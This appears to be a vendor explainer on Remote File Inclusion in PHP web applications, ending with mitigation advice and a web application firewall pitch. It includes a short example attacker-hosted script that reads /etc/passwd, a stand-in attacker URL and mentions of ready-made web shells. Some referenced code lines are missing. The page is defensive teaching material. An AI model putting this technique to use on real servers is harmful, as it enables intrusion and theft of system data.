Remote File Inclusion is an attack technique that exploits the ability of certain web-based programming frameworks to dynamically execute remote scripts. The vulnerability manifests when the name or location of the remote script is constructed using input parameters in an HTTP request and the web application fails to validate these inputs.
Using the parameter’s value, the web server accesses a remote file, specified by a URI (for example, http://www.attacker-site.com/malicious.php) and includes malicious code from this remote file into the currently executing context on the victim web server. The malicious script could steal sensitive data, take over the web server or install backdoors
Remote File Inclusion attacks are mostly performed on the web applications that are built on the server-side scripting language such as PHP. PHP programming uses “file include” extensively and hence it is more vulnerable for RFI attacks. RFI attacks are also manifested in other environments such as JSP, ASP, etc.
If an attacker succeeds in exploiting Remote File Inclusion vulnerability in a web server or a web application, they can include a remotely hosted malicious file and execute the code controlled by the attacker. By executing the code, the attacker can steal session cookies, sensitive data stored on the server, manipulate the content, or control the server completely.
Ready-to-use “web shells” like C99 and R57 are freely available on the web. These are very powerful web based shells that provide a sophisticated UI to completely control the system, including full access to OS commands and file systems, options to install backdoors or Trojans, etc.
The Remote File Inclusion attack occurs when the user-supplied input is not properly filtered or sanitized. The following data must be sanitized properly before being processed:
- URL Parameters
- FORM Parameters (GET and POST parameters)
- HTTP Request Headers
A web user access www.exampleRFI.com and lands in the main page. The request would go to the server as: http://www.exampleRFI.com/content.php?page=menu.php
If the content.php processes the value of “page” parameter as:
According to the above PHP code, menu.php is executed in the server and displayed in content.php in the browser.
If the attacker was able to glean how content.php works, he could try to include a malicious script to be executed instead of menu.php to steal any server information.
As an example, following is a script that the attacker could host to read the password file on UNIX-based systems. (malicious.php which resides in www.attacker-site.com)
$filename = "/etc/passwd";
$fh = fopen($filename, 'r');
$read_content = fread($fh, 1000);
This script is intended to read the content of the password file (/etc/passwd).
The attacker would then tamper the page parameter to point to his remotely hosted malicious script:
This could display the user account information that is stored in the /etc/passwd file of the server.
Properly sanitizing and filtering the user input can prevent remote File Inclusion attacks. Vulnerability scanning and code audits could help identify such vulnerabilities but legacy and third party code could be a challenge. Scanning also does not remediate, so the fixes have to be implemented manually. This could be a challenge when the interfaces are tightly wound into the code.
The Barracuda Web Application Firewall’s default security policy includes rule sets to identify and block RFI attacks out-of-the-box. It logs all instances of such attacks in the Web Firewall Logs along with exact details of the targeted parameter and the malicious values used for the exploit. Alerts and notifications can be setup for such attacks as well.
OWASP Top 10, PCI-DSS